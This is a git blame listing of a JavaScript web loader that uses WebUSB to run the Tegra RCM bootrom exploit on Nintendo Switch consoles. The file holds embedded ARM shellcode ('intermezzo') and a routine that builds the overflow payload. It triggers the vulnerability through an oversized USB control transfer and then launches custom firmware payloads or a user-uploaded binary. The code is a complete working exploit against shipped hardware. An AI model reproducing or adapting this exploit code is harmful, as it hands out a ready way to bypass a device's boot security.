web-cfw-loader/main.js

219 lines
5.9 KiB
JavaScript
Raw Normal View History

2018-04-27 15:54:46 -07:00
const intermezzo = new Uint8Array([
2018-07-22 22:31:48 -05:00
0x44, 0x00, 0x9F, 0xE5, 0x01, 0x11, 0xA0, 0xE3, 0x40, 0x20, 0x9F, 0xE5, 0x00, 0x20, 0x42, 0xE0,
0x08, 0x00, 0x00, 0xEB, 0x01, 0x01, 0xA0, 0xE3, 0x10, 0xFF, 0x2F, 0xE1, 0x00, 0x00, 0xA0, 0xE1,
0x2C, 0x00, 0x9F, 0xE5, 0x2C, 0x10, 0x9F, 0xE5, 0x02, 0x28, 0xA0, 0xE3, 0x01, 0x00, 0x00, 0xEB,
0x20, 0x00, 0x9F, 0xE5, 0x10, 0xFF, 0x2F, 0xE1, 0x04, 0x30, 0x90, 0xE4, 0x04, 0x30, 0x81, 0xE4,
0x04, 0x20, 0x52, 0xE2, 0xFB, 0xFF, 0xFF, 0x1A, 0x1E, 0xFF, 0x2F, 0xE1, 0x20, 0xF0, 0x01, 0x40,
2018-04-27 16:26:15 -07:00
0x5C, 0xF0, 0x01, 0x40, 0x00, 0x00, 0x02, 0x40, 0x00, 0x00, 0x01, 0x40
2018-04-27 15:54:46 -07:00
]);
2018-04-27 15:54:46 -07:00
const RCM_PAYLOAD_ADDRESS = 0x40010000;
const INTERMEZZO_LOCATION = 0x4001F000;
const PAYLOAD_LOAD_BLOCK = 0x40020000;
2018-04-27 15:54:46 -07:00
function createRCMPayload(intermezzo, payload) {
const rcmLength = 0x30298;
2018-07-22 22:31:48 -05:00
2018-04-27 15:54:46 -07:00
const intermezzoAddressRepeatCount = (INTERMEZZO_LOCATION - RCM_PAYLOAD_ADDRESS) / 4;
const rcmPayloadSize = Math.ceil((0x2A8 + (0x4 * intermezzoAddressRepeatCount) + 0x1000 + payload.byteLength) / 0x1000) * 0x1000;
const rcmPayload = new Uint8Array(new ArrayBuffer(rcmPayloadSize))
const rcmPayloadView = new DataView(rcmPayload.buffer);
rcmPayloadView.setUint32(0x0, rcmLength, true);
for (let i = 0; i < intermezzoAddressRepeatCount; i++) {
rcmPayloadView.setUint32(0x2A8 + i * 4, INTERMEZZO_LOCATION, true);
}
rcmPayload.set(intermezzo, 0x2A8 + (0x4 * intermezzoAddressRepeatCount));
rcmPayload.set(payload, 0x2A8 + (0x4 * intermezzoAddressRepeatCount) + 0x1000);
return rcmPayload;
}
2018-04-27 15:54:46 -07:00
function bufferToHex(data) {
let result = "";
for (let i = 0; i < data.byteLength; i++)
result += data.getUint8(i).toString(16).padStart(2, "0");
return result;
}
2018-04-27 15:54:46 -07:00
async function write(device, data) {
let length = data.length;
let writeCount = 0;
const packetSize = 0x1000;
while (length) {
const dataToTransmit = Math.min(length, packetSize);
length -= dataToTransmit;
const chunk = data.slice(0, dataToTransmit);
data = data.slice(dataToTransmit);
await device.transferOut(1, chunk);
writeCount++;
}
return writeCount;
}
2018-04-27 15:54:46 -07:00
function readFileAsArrayBuffer(file) {
return new Promise((res, rej) => {
const reader = new FileReader();
reader.onload = e => {
res(e.target.result);
}
reader.readAsArrayBuffer(file);
});
}
2018-04-27 15:54:46 -07:00
function logOutput(...message) {
2018-05-19 04:29:53 -05:00
document.getElementById("output").innerHTML = document.getElementById("output").innerHTML + message.join(" ") + "<br>";
2018-04-27 15:54:46 -07:00
}
2018-05-17 16:55:01 -05:00
function clearLog() {
2018-05-19 04:29:53 -05:00
document.getElementById("output").innerHTML = "";
2018-05-17 16:55:01 -05:00
}
2018-04-27 16:25:39 -07:00
let device;
2018-04-27 15:54:46 -07:00
async function launchPayload(payload) {
await device.open();
logOutput(`Connected to ${device.manufacturerName} ${device.productName}`);
await device.claimInterface(0);
const deviceID = await device.transferIn(1, 16);
logOutput(`Device ID: ${bufferToHex(deviceID.data)}`);
const rcmPayload = createRCMPayload(intermezzo, payload);
logOutput("Sending payload...");
const writeCount = await write(device, rcmPayload);
logOutput("Payload sent!");
if (writeCount % 2 !== 1) {
logOutput("Switching to higher buffer...");
await device.transferOut(1, new ArrayBuffer(0x1000));
}
2018-07-22 22:31:48 -05:00
2018-04-27 15:54:46 -07:00
logOutput("Trigging vulnerability...");
2018-07-22 22:31:48 -05:00
const vulnerabilityLength = 0x7000;
2018-04-27 15:54:46 -07:00
const smash = await device.controlTransferIn({
requestType: 'standard',
recipient: 'interface',
request: 0x00,
value: 0x00,
index: 0x00
}, vulnerabilityLength);
}
2018-04-27 15:54:46 -07:00
document.getElementById("goButton").addEventListener("click", async () => {
2018-05-17 16:57:06 -05:00
clearLog();
2018-05-17 08:34:55 -05:00
var debugCheckbox = document.getElementById("shouldDebug");
const payloadType = document.getElementById("payloadSelect").value;
2018-07-22 22:31:48 -05:00
2018-06-24 08:45:33 -05:00
if(!debugCheckbox.checked) {
logOutput("Requesting access to device...");
try {
device = await navigator.usb.requestDevice({ filters: [{ vendorId: 0x0955 }] });
} catch (error) {
console.log(error);
logOutput("Failed to get a device. Did you chose one?");
return;
}
2018-06-24 08:45:33 -05:00
}
2018-05-17 08:40:52 -05:00
let payload;
2018-07-04 13:23:55 +02:00
if (payloadType === "CTCaer_Hekate") {
2018-10-21 14:44:32 -05:00
payload = CTCaer_Hekate;
2018-05-17 16:30:13 -05:00
} else if (payloadType === "fusee") {
payload = fusee;
2018-07-22 22:31:48 -05:00
2018-06-30 15:00:56 +02:00
} else if (payloadType === "sx os") {
payload = sx;
2018-07-22 22:31:48 -05:00
} else if (payloadType === "ReiNX") {
payload = ReiNX;
} else if (payloadType === "atmosphere") {
payload = fusee_ams;
2018-07-23 21:43:02 +02:00
2018-05-17 08:40:52 -05:00
} else if (payloadType === "uploaded") {
const file = document.getElementById("payloadUpload").files[0];
if (!file) {
alert("You need to upload a file, to use an uploaded file.");
return;
2018-05-17 08:37:57 -05:00
}
2018-05-21 01:00:34 -05:00
logOutput("Using uploaded payload \"" + file.name + "\"");
2018-05-17 08:40:52 -05:00
payload = new Uint8Array(await readFileAsArrayBuffer(file));
2018-07-22 22:31:48 -05:00
2018-05-17 08:40:52 -05:00
} else {
logOutput("<span style='color:red'>You're trying to load a payload type that doesn't exist.</span>");
2018-05-17 08:40:52 -05:00
return;
}
if(debugCheckbox.checked) {
logOutput("Logging payload bytes...");
2018-05-17 13:05:21 -05:00
var payloadToLog = "";
for (var i = 0; i < payload.length; i++) {
payloadToLog += "0x" + payload[i].toString(16) + ", ".toUpperCase();
}
2018-05-21 01:00:34 -05:00
payloadToLog = payloadToLog;
2018-05-17 12:23:12 -05:00
logOutput(payloadToLog);
2018-10-21 13:38:38 -05:00
console.log(document.getElementById("payloadUpload").files[0]);
2018-05-17 10:06:12 -05:00
return;
2018-05-17 08:29:39 -05:00
}
2018-05-19 00:07:43 -05:00
logOutput(`<span style='color:blue'>Preparing to launch ${payloadType}...</span>`);
2018-04-27 15:54:46 -07:00
launchPayload(payload);
});
function onSelectChange() {
if (document.getElementById("payloadSelect").value === "uploaded")
document.getElementById("uploadContainer").style.display = "block"
else
document.getElementById("uploadContainer").style.display = "none"
}
2018-05-17 23:45:09 -05:00
function openInfo() {
2018-05-17 23:24:33 -05:00
if(document.getElementById("infodiv").innerHTML != "") {
document.getElementById("infodiv").innerHTML = "";
2018-07-22 22:31:48 -05:00
}
2018-05-17 23:24:33 -05:00
}
2018-05-17 23:45:09 -05:00
2018-05-17 23:45:09 -05:00
function openInstructions() {
if(document.getElementById("infodiv").innerHTML != "") {
document.getElementById("infodiv").innerHTML = "";
2018-05-18 00:16:22 -05:00
}
2018-05-17 23:45:09 -05:00
}